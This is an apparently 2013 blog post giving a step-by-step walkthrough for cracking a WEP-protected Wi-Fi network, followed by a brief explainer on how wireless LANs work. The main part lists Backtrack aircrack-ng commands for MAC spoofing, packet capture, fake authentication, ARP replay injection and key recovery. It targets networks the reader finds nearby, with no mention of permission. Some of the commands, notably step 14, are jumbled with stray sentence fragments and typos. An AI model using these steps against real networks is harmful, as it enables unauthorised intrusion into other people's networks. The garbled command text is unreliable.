Wednesday 24 July 2013

hack wifi network 2013

Step 1:-First Download Backtrack from the following link:http://www.remote-exploit.org/backtrack_download.htmlStep 2:-Burn the iso image on CD and boot your laptop from CD driveStep 3:-Select the third boot option(VESA/KDE).Step 4:-Once in BT3, click the tiny black boxin the lower left corner to load up a"Konsole" window.Step 5:-Type the following commandairmon-ngNote down the interface name. In this example wifi0Step 6:-airmon-ng stop wifi0Step 7:-ifconfig wifi0 downStep 8:-macchanger --mac 00:11:22:33:44:66 wifi0Step 9:-airmon-ng start wifi0Step 10:-airodump-ng wifi0This will start populating Wifi networks. Press Ctrl + C to stop.Check the network with WEP encryption.Notedown BSSID, CH and ESSID somewhere in notepad or paperNote that if the same BSSID is available in the second part with STATION associated with it,means you some one is accessing that network and our task will be little easier.If not than don’t worry we will still crack it.Step 11:-airodump-ng -c (channel) -w (file name)Replace(channel) with the CH which u had already n(file name) with any name of your choice(bssid) with the BSSID which u had already note--bssid (bssid) wifi0Note itLeave this console as it is and start new konsoleStep 12:-aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0If you don’t get Association Successful mesage then keep on trying untilyou got success.Step 13:-aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0Well if you don’t see ARP ACK and sent packets are not increasing or still 0than it means no 1 isaccessing that network.But don’t worry you go an optional step,Leave this console as it is and start new kStep 14:-aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FFkonsolemessage than keep on trying until you get successgot an optional stepkonsole–b (bssid) –h 00:11:22:33:44:66 wfi0Press y and enterNow you will see that ARP and ACK packets in 2nd console are increasing fastKeep this console as it is and start 4th console.Step 15:-aircrack-ng -b (bssid) (filename)-Just wait and watch…..Backtrack willdo rest of the work.Hurray we got the key.Done..!!Wireless networks are everywhere; they are widely available, cheap, and easy to setup. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network?I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I sooncame to the realization that the best way for me to understand the security of my wireless network would be to test it myself. Many sources said it was easy, few said it was hard.How a wireless network worksA wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs), or clients.Access points are base stations for the wireless network. They receive and transmit information for the clients to communicate with. The set of all stations that communicatewith each other is referred to as the Basic Service Set (BSS). Every BSS has an Identification known as a BSSID, also known as the MAC address, which is a unique identifier that is associated with every NIC. For any client to join a WLAN, it should know the SSID of the WLAN; therefore, the access points typically broadcast their SSIDto let the clients know that an AP is in range. Data streams, known as packets, are sent between the Access Point, and it’s clients. You need no physical access to the network or its wires to pick up these packets, just the right tools. It is with the transmission of these packets that pose the largest security threat to any wireless network.

No comments:

Post a Comment